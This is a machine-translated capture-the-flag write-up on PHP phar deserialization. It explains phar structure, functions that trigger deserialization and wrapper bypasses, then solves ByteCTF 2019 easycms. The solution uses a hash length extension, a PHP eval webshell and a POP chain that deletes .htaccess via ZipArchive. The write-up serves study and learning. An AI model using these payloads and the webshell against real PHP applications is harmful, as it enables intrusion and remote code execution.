0x01 Reference Links
In order to express my gratitude, first released most of the contents of the reference link
link
0x02 explain principle
nature phar is a compressed file, each of which is compressed file permissions, attributes and other information are placed in this section. This part will be stored as a sequence of user-defined meta-data
, which is the core of the above-mentioned methods of attack place
according to the file structure of our own to build a phar
file, php
built a Phar
class to handle related operations
Note: To use php.ini
the phar.readonly
option settings to Off
, or can not generate phar file.
<?php
class TestObject {
//魔法函数(文件包含phar文件时会反序列化)
}
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub('GIF89a'.'<?php __HALT_COMPILER(); ?>'); //设置stub,添加GIF头,可以绕过图片格式检查
$o = new TestObject();
$o -> data='hu3sky';
$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>
The following functions will phar
file deserialization
Additional functions found
exif
exif_thumbnail
exif_imagetype
gd
imageloadfont
imagecreatefrom***
hash
hash_hmac_file
hash_file
hash_update_file
md5_file
sha1_file
file / url
get_meta_tags
get_headers
standard
getimagesize
getimagesizefromstringfinfo_file/finfo_buffer/mime_content_type
zip
$zip = new ZipArchive();
$res = $zip->open('c.zip'); //我们将phar压缩后,将压缩包的文件改为gif,此时仍然可以解压
$zip->extractTo('phar://test.phar/test');
zip
LOAD DATA LOCAL INFILE
Will trigger this php_stream_open_wrapper
. Let's test it
<?php
class A {
public $s = '';
public function __wakeup () {
system($this->s);
}
}
$m = mysqli_init();
mysqli_options($m, MYSQLI_OPT_LOCAL_INFILE, true);
$s = mysqli_real_connect($m, 'localhost', 'root', '123456', 'easyweb', 3306);
$p = mysqli_query($m, 'LOAD DATA LOCAL INFILE \'phar://test.phar/test\' INTO TABLE a LINES TERMINATED BY \'\r\n\' IGNORE 1 LINES;');
Re-allocationmysqld
[mysqld]
local-infile=1
secure_file_priv=""
Bypassing the phar: // limit head
0x01
$z = 'compress.bzip2://phar:///home/sx/test.phar/test.txt';
$z = 'compress.zlib://phar:///home/sx/test.phar/test.txt';
@file_get_contents($z);
0x02
@include('php://filter/read=convert.base64-encode/resource=phar://yunying.phar');
mime_content_type('php://filter/read=convert.base64-encode/resource=phar://yunying.phar')
0x03 reproducible bytectf_2019_easycms
Get accesswww.zip
index.php
Verify landing page, you can log in to any accountupload.php
upload page, but onlyadmin
account to upload files.- Visited
upload.php
*, it will generate a sandbox in the.htaccess
file, reads:lolololol, i control all
- After uploading a file, it will return to the storage path to the file,
view details
you can enterview.php
, echoes filemime
type and file path. - Because the directory
.htaccess
is written content, it can not be resolved, so access uploaded files will be reported 500
0x01 hash length to expand attacks (hashpump.py)
Objects are instantiated from a class of Admin. Follow Admin
Confirmed the attack to expand the hash length, the specific method of attack will not list them, Baidu click on the line.
0x02 Phar pop chain structure
Known long pass folder exists .htaccess, so we upload php horse can not be properly resolved, we find a way to delete the .htaccess.
Just try to upload a picture horse
there is a filter
there are two ideas attacks
- phar deserialization will upload_file upload to another directory, bypassing sanbox control in .htaccess
- Prior to upload a php horse, then PHP deserialize delete .htaccess file
Because we do not know the directory to store temporary files, you can only use the second approach.
We see view.php There is a File
category, follow-up File
class
above already mentioned, mime_content_type can be made starting phar serialization.
At the same time we note that there is a magic class Profile function __call
which has an open function, and admin, username, password control, so we have to find those open class method.
(ZipArchive,SessionHandler)
ZipArchive which can be utilized.
ZipArchive::open ( string $filename [, int $flags ] ) : mixed
With this overwrite
method, you can directly delete .htaccess
files
attention here can also open a non-compressed files, such as.htaccess
We first upload a horse
<?php
$a = "sys"."tem";
eval($_POST["xxx"]);
?>
Then construct `phar pop` attack chain
<?php
class File{
public $filename;
public $filepath;
public $checker;
}
class Profile{
public $username;
public $password;
public $admin;
}
$a=new File();
$a->checker=new Profile();
$a->checker->admin=new ZipArchive();
$a->checker->username="/var/www/html/sandbox/fd40c7f4125a9b9ff1a4e75d293e3080/.htaccess";
$a->checker->password=ZipArchive::OVERWRITE;
$phar = new Phar('phar.phar');
$phar -> startBuffering();
$phar -> setStub('<?php __HALT_COMPILER();?>');
$phar -> addFromString('test.txt','test');
$phar -> setMetadata($a);
$phar -> stopBuffering();
?>
Cried, upload phar was filtered, `prompt you scares me`, winhex see a `` but after deleting may damage the phar structure would not work. Then replace php 7.0 is fully uploaded to solve the problem. We have to keep up with the trend of the times. Own meal storm hammer
By php://filter
bypassing detection to trigger wafphar
view.php?filename=9c7f4a2fbf2dd3dfb7051727a644d99f.phar&filepath=php://filter/resource=phar://sandbox/fd40c7f4125a9b9ff1a4e75d293e3080/9c7f4a2fbf2dd3dfb7051727a644d99f.phar
Successfully deleted.htaccess